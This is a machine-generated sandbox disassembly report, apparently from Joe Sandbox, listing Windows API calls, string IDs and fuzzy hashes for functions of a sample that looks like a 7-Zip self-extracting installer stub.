                                                                • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                • DestroyWindow.USER32(?), ref: 00402EA3
                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                • API String ID: 1731037045-2281146334
                                                                • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                APIs
                                                                • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                • String ID:
                                                                • API String ID: 3462224810-0
                                                                • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                APIs
                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                • GetMenu.USER32(?), ref: 00401E44
                                                                  • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                  • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                  • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                  • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                  • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                  • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                  • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                  • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                  • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                  • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                  • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                  • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                • String ID: IMAGES$STATIC
                                                                • API String ID: 4202116410-1168396491
                                                                • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                APIs
                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                • SetFocus.USER32(00000000), ref: 0040821D
                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                • IsWindow.USER32(00000000), ref: 00408297
                                                                • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                • EnableWindow.USER32(00000000), ref: 004082AA
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                • ShowWindow.USER32(00000000), ref: 004082C1
                                                                  • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                  • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                  • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                  • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                  • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerwsprintf
                                                                • String ID:
                                                                • API String ID: 1309318444-0
                                                                • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                • strncmp.MSVCRT ref: 004031F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$lstrcmpstrncmp
                                                                • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                • API String ID: 2881732429-172299233
                                                                • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                • GetParent.USER32(?), ref: 00406B43
                                                                • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                • GetClientRect.USER32(?,?), ref: 00406C55
                                                                • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                  • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                  • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                • String ID:
                                                                • API String ID: 747815384-0
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                • LoadIconW.USER32(00000000), ref: 00407D33
                                                                • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                • LoadImageW.USER32(00000000), ref: 00407D54
                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                Similarity
                                                                • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                • String ID:
                                                                • API String ID: 1889686859-0
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00406F45
                                                                • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                • GetWindowDC.USER32(?), ref: 00406FAA
                                                                • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                Similarity
                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                • String ID:
                                                                • API String ID: 2586545124-0
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                • SetFocus.USER32(00000000,?,000004B4,76B10E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                Similarity
                                                                • API ID: ItemMessageSend$Focus
                                                                • String ID:
                                                                • API String ID: 3946207451-0
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                Strings
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: IA$IA$IA$IA$IA$IA
                                                                • API String ID: 613200358-3743982587
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                Strings
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                • API String ID: 613200358-994561823
                                                                APIs
                                                                • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                • GetDC.USER32(00000000), ref: 00406DFB
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                Similarity
                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                • String ID:
                                                                • API String ID: 2693764856-0
                                                                APIs
                                                                • GetDC.USER32(?), ref: 0040696E
                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                • SelectObject.GDI32(?,?), ref: 004069B8
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                • SelectObject.GDI32(?,?), ref: 004069F9
                                                                • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                Similarity
                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                • String ID:
                                                                • API String ID: 2466489532-0
                                                                APIs
                                                                • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,76B0E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                Strings
                                                                Similarity
                                                                • API ID: ??3@$CharUpper$lstrlen
                                                                • String ID: hAA
                                                                • API String ID: 2587799592-1362906312
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                  • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                  • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                  • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                  • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                Strings
                                                                Similarity
                                                                • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                • API String ID: 4038993085-2279431206
                                                                APIs
                                                                • EndDialog.USER32(?,00000000), ref: 00407579
                                                                • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                • SuspendThread.KERNEL32(0000026C), ref: 004075CD
                                                                • ResumeThread.KERNEL32(0000026C), ref: 004075EA
                                                                • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                • String ID:
                                                                • API String ID: 4151135813-0
                                                                • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                  • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                • wsprintfA.USER32 ref: 00404EBC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$wsprintf
                                                                • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                • API String ID: 2704270482-1550708412
